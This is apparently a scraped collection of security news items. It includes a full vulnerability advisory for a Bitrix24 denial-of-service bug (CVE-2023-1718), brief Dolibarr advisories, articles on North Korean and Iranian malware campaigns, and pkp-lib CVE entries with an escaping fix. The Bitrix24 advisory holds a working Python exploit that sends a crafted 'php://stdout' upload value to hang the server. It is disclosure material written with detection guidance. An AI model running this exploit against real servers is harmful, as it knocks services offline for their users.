
Improper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".







**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

High

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1718

**CVE Description**

Improper file stream access in /desktop\_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted “tmp\_url”.

**CWE Classification(s)**

CWE-835 Loop with Unreachable Exit Condition (‘Infinite Loop’)

**CAPEC Classification(s)**

CAPEC-545 Pull Data from System Resources

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

None

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

None

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Denial of Service (DoS) vulnerability that allows an attacker cause the affected webserver to be unresponsive due to excessive computing resource consumption.

Unauthenticated users may use the file upload functionality provided by the /desktop_app/file.ajax.php?action=uploadfile. In addition to files uploaded within the request, files can also be specified by their URL. These files will then by downloaded and saved. This URL is specified in the tmp_url field of the supplied file object.

The checkFile function is eventually called on the file object:

    // bitrix/modules/main/lib/ui/uploader/file.php line 590
    
    public static function checkFile(&$file, File $f, $params)
    {
        $result = new Result();
        if ($file["error"] > 0)
            $result->addError(new Error(File::getUploadErrorMessage($file["error"]), "BXU347.2.9".$file["error"]));
        else if (array_key_exists("tmp_url", $file))
        {
            $url = new Uri($file["tmp_url"]); // [1]
            if ($url->getHost() == '' && 
                ($tmp = \CFile::MakeFileArray($url->getPath())) && // [2]
                is_array($tmp))
            {
                $file = array_merge($tmp, $file);
            }
            // ...
        }
        // ...
    }
    

In [1], the URL supplied in tmp_url is parsed. The path of the URL is then passed to CFile::MakeFileArray in [2].

    // bitrix/modules/main/classes/general/file.php line 1734
    
    public static function MakeFileArray($path, $mimetype = false, $skipInternal = false, $external_id = "")
    {
        $io = CBXVirtualIo::GetInstance();
        $arFile = array();
    
        if(intval($path)>0)
        {
            // ...
        }
    
        $path = preg_replace("#(?<!:)[\\\\\\/]+#", "/", $path);
    
        if($path == '' || $path == "/")
        {
            return NULL;
        }
    
        if(preg_match("#^(php://filter|phar://)#i", $path))
        {
            return NULL;
        }
    
        if(preg_match("#^(http[s]?)://#", $path))
        {
            // ...
        }
        elseif(preg_match("#^(ftp[s]?|php)://#", $path)) // [3]
        {
            if($fp = fopen($path,"rb"))
            {
                $content = "";
                while(!feof($fp)) // [4]
                {
                    $content .= fgets($fp, 4096);
                }
    
                if($content <> '')
                {
                    // ...
                }
    
                fclose($fp);
            }
        }
        else
        {
            // ...
        }
    
        // ..
    }
    

If the path starts with ftp://, ftps:// or php://, control flow enters the branch at [3]. The file is then opened with fopen, and its contents are read in chunks of 4096 bytes until the EOF marker is reached ([4]).

However, if an attacker specifies the PHP stream php://stdout, the EOF marker will never be reached as the stream is a write-only stream. Therefore, the program will enter an infinite loop as !feof($fp) will always be true.

This will result in the process handling the request consuming as much compute time as it is allowed, preventing the handling of other legitimate requests.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that results in Denial of Service via resource exhaustion on the target server.

A sample exploit script is shown below:

    # Bitrix24 Improper File Stream Access DoS (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/desktop_app/file.ajax.php?action=uploadfile
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import random
    
    import requests
    import re
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def preauth(s):
        res = s.get(HOST)
        return re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), res.text).group(
            1
        )
    
    
    def DoS(session, sessid):
        CID = random.randint(0, pow(10, 5))
        session.post(
            HOST + "/desktop_app/file.ajax.php?action=uploadfile",
            headers={
                "X-Bitrix-Csrf-Token": sessid,
                "X-Bitrix-Site-Id": SITE_ID,
            },
            data={
                "bxu_info[mode]": "upload",
                "bxu_info[CID]": str(CID),
                "bxu_info[filesCount]": "1",
                "bxu_info[packageIndex]": f"pIndex{CID}",
                "bxu_info[NAME]": f"file{CID}",
                "bxu_files[0][name]": f"file{CID}",
                "bxu_files[0][files][default][tmp_url]": f"a:php://stdout",
                "bxu_files[0][files][default][tmp_name]": f"file{CID}",
            },
            proxies=PROXY,
        )
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = preauth(s)
        print("[+] Launching DoS...")
        DoS(s, sessid)
    

**Exploit Conditions:**

This vulnerability can be exploited by unauthenticated users.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of php://stdout or file:///dev/stdout in request bodies.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1718: (CVE-2023-1718) Bitrix24 Denial-of-Service (DoS) via Improper File Stream Access

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**Dolibarr Improper Input Validation vulnerability**

High severity GitHub Reviewed Published Nov 1, 2023 to the GitHub Advisory Database • Updated Nov 1, 2023

GHSA-r9cm-pw9j-3fpx: Dolibarr Improper Input Validation vulnerability

Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data

**Dolibarr Improper Input Validation vulnerability**

Moderate severity GitHub Reviewed Published Nov 1, 2023 to the GitHub Advisory Database • Updated Nov 1, 2023

GHSA-48v2-596x-4jr9: Dolibarr Improper Input Validation vulnerability

State-sponsored threat actors from the Democratic People's Republic of Korea (DPRK) have been found targeting blockchain engineers of an unnamed crypto exchange platform via Discord with a novel macOS malware dubbed KANDYKORN.
Elastic Security Labs said the activity, traced back to April 2023, exhibits overlaps with the infamous adversarial collective Lazarus Group, citing an analysis of the

State-sponsored threat actors from the Democratic People's Republic of Korea (DPRK) have been found targeting blockchain engineers of an unnamed crypto exchange platform via Discord with a novel macOS malware dubbed **KANDYKORN**.

Elastic Security Labs said the activity, traced back to April 2023, exhibits overlaps with the infamous adversarial collective Lazarus Group, citing an analysis of the network infrastructure and techniques used.

"Threat actors lured blockchain engineers with a Python application to gain initial access to the environment," security researchers Ricardo Ungureanu, Seth Goodwin, and Andrew Pease said in a report published today.

"This intrusion involved multiple complex stages that each employed deliberate defense evasion techniques."

This is not the first time the Lazarus Group has leveraged macOS malware in its attacks. Earlier this year, the threat actor was observed distributing a backdoored PDF application that culminated in the deployment of RustBucket, an AppleScript-based backdoor capable of retrieving a second-stage payload from a remote server.

What makes the new campaign stand out is the attacker's impersonation of blockchain engineers on a public Discord server, employing social engineering lures to trick victims into downloading and executing a ZIP archive containing malicious code.

"The victim believed they were installing an arbitrage bot, a software tool capable of profiting from cryptocurrency rate differences between platforms," the researchers said. But in reality, the attack chain paved the way for the delivery of KANDYKORN following a five-stage process.

"KANDYKORN is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection," the researchers said. "It utilizes reflective loading, a direct-memory form of execution that may bypass detections."

The starting point is a Python script (watcher.py), which retrieves another Python script (testSpeed.py) hosted on Google Drive. This dropper, for its part, fetches one more Python file from a Google Drive URL, named FinderTools.

FinderTools also functions as a dropper, downloading and executing a hidden second stage payload referred to as SUGARLOADER (/Users/shared/.sld and .log) that ultimately connects to a remote server in order to retrieve KANDYKORN and execute it directly in memory.

SUGARLOADER is also responsible for launching a Swift-based self-signed binary known as HLOADER that attempts to pass off as the legitimate Discord application and executes .log (i.e., SUGARLOADER) to achieve persistence using a method called execution flow hijacking.

KANDYKORN, which is the final-stage payload, is a full-featured memory resident RAT with built-in capabilities to enumerate files, run additional malware, exfiltrate data, terminate processes, and run arbitrary commands.

"The DPRK, via units like the LAZARUS GROUP, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions," the researchers said.

**Kimsuky Resurfaces with Updated FastViewer Malware**

The disclosure comes as the S2W Threat Analysis team uncovered an updated variant of an Android spyware called FastViewer that's used by a North Korean threat cluster dubbed Kimsuky (aka APT43), a sister hacking outfit of the Lazarus Group.

FastViewer, first documented by the South Korean cybersecurity firm in October 2022, abuses Android's accessibility services to covertly harvest sensitive data from compromised devices by masquerading itself as seemingly harmless security or e-commerce apps that are propagating via phishing or smishing.

It's also designed to download a second-stage malware named FastSpy, which is based on the open-source project AndroSpy, to execute data gathering and exfiltration commands.

"The variant has been in production since at least July 2023 and, like the initial version, is found to induce installation by distributing repackaged APKs that include malicious code in legitimate apps," S2W said.

One notable aspect of the new version is the integration of FastSpy's functionality into the FastViewer, thus obviating the need to download additional malware. That said, S2W said "there are no known cases of this variant being distributed in the wild."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Tageting Crypto Experts with KANDYKORN macOS Malware

By Deeba Ahmed
Researchers believe that the primary goal behind this campaign is espionage. 
This is a post from HackRead.com Read the original post: Iran’s Scarred Manticore Targets Middle East with LIONTAIL Malware

Scarred Manticore is targeting high-profile organizations focusing keenly on telecommunication, military, and government entities apart from financial institutions, IT service providers, and NGOs.

Check Point Research (CPR) and Sygnia’s Incident Response Team have uncovered a new Iranian espionage campaign they have tied to the notorious Scarred Manticore threat group.

In its technical report titled “From Albanian to the Middle East: The Scarred Manticore is Listening,” it is revealed that the group is using a previously undocumented malware framework called LIONTAIL. This malware uses custom loaders and memory-resident shellcode payloads to blend its malicious functionalities into legitimate network traffic.

Researchers believe that the primary goal behind this campaign is espionage. This threat actor is among the Iranian actors involved in destructive cyberattacks against the Albanian government infrastructure at the behest of MOIS (Ministry of Intelligence & Security) back in July 2022. CPR claims that this threat group has been active since at least 2019, prefers gaining covert access, and persistently pursues data extraction.

Further probing revealed that Scarred Manticore is targeting high-profile organizations in the Middle East in this ongoing espionage campaign, focusing keenly on telecommunication, military, and government entities apart from financial institutions, IT service providers, and NGOs.

Though the LIONTAIL framework appears unique with no code overlaps with any known malware family detected thus far, the other tools used in the attacks overlap with previously reported attacks. Some of these attacks are linked to the OilRig or OilRig-affiliated clusters but there’s insufficient evidence to link the Scarred Manticore group with OilRig. 

Since 2019, this group has been using a custom toolset to compromise internet-exposed Windows servers in the Middle East. In this particular campaign, CPR has uncovered, that the victims are located in Saudi Arabia, the UAE, Kuwait, Jordan, Iraq, Oman, and Israel.

The geographic regions targeted in this campaign and Scarred Manticore’s previous activities sharply align with Iranian interests and with the typical victim profile targeted by MOIS-sponsored groups in espionage operations.

Scarred Manticore’s toolset has evolved considerably over time as from open-source web-based proxies, they gradually switched to powerful tools combining open-source and custom components. The Tunna-based web shell is one of the group’s earliest tools, an open-source tool used to tunnel TCP communications over HTTP to let attackers connect to any service on the remote host, even those blocked by firewalls. 

This actor now uses a range of IIS-based backdoors to target Windows servers, including custom web shells, custom DLL backdoors, and driver-based implants. The custom malware framework LIONTAIL, which CPR dubbed ‘digital chameleon,’ can establish persistence on compromised systems and steal sensitive data without being detected. It uses custom loaders and special codes to remain in the computer’s memory and hijacks the HTTP.sys driver to become a part of the regular network activity.

The evolution in Scarred Manticore’s tools and capabilities demonstrates the progress Iranian threat actors have undergone within the past few years because the techniques used in recent campaigns are far more sophisticated than previous ones tied to Iran.

****_RELATED ARTICLES_****

1.  Iran-linked hackers hit Israeli, US and EU defence tech firm
2.  GhostSec Claim Breaching Iranian Govt Surveillance Software Tool
3.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
4.  Iranian Stalkerware ‘Spyhide’ Steals Data from 60,000 Android Devices
5.  Ransom fail: Iranian hackers leak trove of Israeli LGBTQ dating app data
6.  Log4Shell – Iranian Hackers Accessed Domain Controller of US Federal Network

Iran’s Scarred Manticore Targets Middle East with LIONTAIL Malware

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-5890: pkp/pkp-lib#9411 Reviewer name is not escaped when presented in revie… · pkp/pkp-lib@a868f1c

Insufficient Session Expiration in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

CVE-2023-5889

Cross-Site Request Forgery (CSRF) in GitHub repository pkp/customLocale prior to 1.2.0-1.

CVE-2023-5897: https://github.com/pkp/customLocale/issues/27 Add CSRF checking · pkp/customLocale@407ba30

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.4.0-4.

CVE-2023-5896

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/ojs prior to 3.3.0-16.

Expand Up

@@ -58,7 +58,7 @@ public function getCellActions($request, $row, $column, $position = GridHandler:

'edit',

new AjaxModal(

$router\->url($request, null, null, 'editIssue', null, \['issueId' => $issue\->getId()\]),

\_\_('editor.issues.editIssue', \['issueIdentification' => $issue\->getIssueIdentification()\]),

\_\_('editor.issues.editIssue', \['issueIdentification' => htmlspecialchars($issue\->getIssueIdentification())\]),

'modal\_edit',

true

),

Expand Down

Tag

#git